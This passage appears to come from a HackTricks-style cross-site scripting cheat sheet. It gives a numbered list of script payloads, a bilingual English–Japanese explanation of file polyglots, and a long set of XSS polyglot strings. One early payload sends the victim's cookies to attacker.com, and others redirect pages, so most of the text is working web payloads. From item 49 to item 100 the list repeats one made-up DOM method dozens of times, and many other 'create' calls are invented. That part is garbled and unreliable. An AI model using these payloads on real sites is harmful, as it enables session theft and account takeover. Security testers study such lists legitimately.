<meta http-equiv="refresh" content="0;url=javascript:alert('XSS');">
<script>document.location='https://attacker.com/collect.php?cookie='+document.cookie;</script>

16. Local Storage

<script>localStorage.setItem('xss', 'true');</script>

17. Session Storage

<script>sessionStorage.setItem('xss', 'true');</script>
<script>document.cookie='xss=true';</script>

19. Document Write

<script>document.write('XSS');</script>

20. Document Domain

<script>document.domain='attacker.com';</script>

21. Document Referrer

<script>document.referrer;</script>

22. Document Location

<script>document.location='https://attacker.com';</script>

23. Document Title

<script>document.title='XSS';</script>

24. Document WriteLn

<script>document.writeln('XSS');</script>

25. Document Open

<script>document.open();document.write('XSS');</script>

26. Document Close

<script>document.close();</script>

27. Document CreateElement

<script>document.createElement('img');</script>

28. Document CreateTextNode

<script>document.createTextNode('XSS');</script>

29. Document CreateEvent

<script>document.createEvent('Event');</script>

30. Document CreateRange

<script>document.createRange();</script>

31. Document CreateComment

<script>document.createComment('XSS');</script>

32. Document CreateAttribute

<script>document.createAttribute('XSS');</script>

33. Document CreateDocumentFragment

<script>document.createDocumentFragment();</script>

34. Document CreateExpression

<script>document.createExpression('XSS');</script>

35. Document CreateNSResolver

<script>document.createNSResolver('XSS');</script>

36. Document CreateProcessingInstruction

<script>document.createProcessingInstruction('XSS');</script>

37. Document CreateTreeWalker

<script>document.createTreeWalker('XSS');</script>

38. Document CreateNodeIterator

<script>document.createNodeIterator('XSS');</script>

39. Document CreateCDATASection

<script>document.createCDATASection('XSS');</script>

40. Document CreateEntityReference

<script>document.createEntityReference('XSS');</script>

41. Document CreateEntity

<script>document.createEntity('XSS');</script>

42. Document CreateNotation

<script>document.createNotation('XSS');</script>

43. Document CreateProcessingInstruction

<script>document.createProcessingInstruction('XSS');</script>

44. Document CreateAttributeNS

<script>document.createAttributeNS('XSS');</script>

45. Document CreateElementNS

<script>document.createElementNS('XSS');</script>

46. Document CreateEventObject

<script>document.createEventObject('XSS');</script>

47. Document CreateStyleSheet

<script>document.createStyleSheet('XSS');</script>

48. Document CreatePopup

<script>document.createPopup('XSS');</script>

49. Document CreateRangeCollection

<script>document.createRangeCollection('XSS');</script>

50. Document CreateRenderStyle

<script>document.createRenderStyle('XSS');</script>

51. Document CreateRenderStyleRule

<script>document.createRenderStyleRule('XSS');</script>

52. Document CreateRenderStyleRuleList

<script>document.createRenderStyleRuleList('XSS');</script>

53. Document CreateRenderStyleRuleIterator

<script>document.createRenderStyleRuleIterator('XSS');</script>

54. Document CreateRenderStyleRuleListIterator

<script>document.createRenderStyleRuleListIterator('XSS');</script>

55. Document CreateRenderStyleRuleListCollection

<script>document.createRenderStyleRuleListCollection('XSS');</script>

56. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

57. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

58. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

59. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

60. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

61. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

62. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

63. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

64. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

65. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

66. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

67. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

68. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

69. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

70. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

71. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

72. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

73. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

74. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

75. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

76. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

77. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

78. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

79. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

80. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

81. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

82. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

83. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

84. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

85. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

86. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

87. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

88. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

89. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

90. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

91. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

92. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

93. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

94. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

95. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

96. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

97. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

98. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

99. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>

100. Document CreateRenderStyleRuleListCollectionIterator

<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()

ポリグロット

A polyglot is a file that can be interpreted as different file types depending on the context in which it is opened. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.

ポリグロットは、開かれる文脈によっお異なるファむルタむプずしお解釈されるこずができるファむルです。りェブハッキングの文脈では、ポリグロットはセキュリティ察策を回避し、悪意のあるコヌドを実行するために䜿甚されるこずがありたす。

Polyglot Techniques

Comment Polyglots

Comment polyglots exploit the fact that different file types have different comment syntax. By crafting a file with comments in multiple formats, it can be interpreted as different file types depending on the context.

コメントポリグロット

コメントポリグロットは、異なるファむルタむプには異なるコメントの構文があるずいう事実を利甚しおいたす。耇数の圢匏のコメントを含むファむルを䜜成するこずで、文脈に応じお異なるファむルタむプずしお解釈されるこずがありたす。

Extension Polyglots

Extension polyglots take advantage of the fact that different file types have different file extensions. By using a specific combination of file extensions, a file can be interpreted as different file types depending on the context.

拡匵子ポリグロット

拡匵子ポリグロットは、異なるファむルタむプには異なるファむル拡匵子があるずいう事実を利甚しおいたす。特定の組み合わせのファむル拡匵子を䜿甚するこずで、文脈に応じお異なるファむルタむプずしお解釈されるこずがありたす。

MIME Type Polyglots

MIME type polyglots exploit the fact that different file types have different MIME types. By crafting a file with multiple MIME types, it can be interpreted as different file types depending on the context.

MIMEタむプポリグロット

MIMEタむプポリグロットは、異なるファむルタむプには異なるMIMEタむプがあるずいう事実を利甚しおいたす。耇数のMIMEタむプを持぀ファむルを䜜成するこずで、文脈に応じお異なるファむルタむプずしお解釈されるこずがありたす。

Conclusion

Polyglots are powerful tools in the hands of a hacker. By exploiting the different interpretations of file types, polyglots can be used to bypass security measures and execute malicious code. It is important for security professionals to be aware of polyglot techniques in order to effectively defend against them.

結論

ポリグロットは、ハッカヌの手にある匷力なツヌルです。ファむルタむプの異なる解釈を利甚するこずで、ポリグロットはセキュリティ察策を回避し、悪意のあるコヌドを実行するために䜿甚されるこずがありたす。セキュリティの専門家は、ポリグロットの技術に぀いお正しく理解し、それに察しお効果的に防埡するこずが重芁です。

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=document.location=`//localhost/mH`//>
☁ HackTricks Cloud ☁ -🐊 Twitter 🐊 - 🎙 Twitch 🎙 - 🎥 Youtube 🎥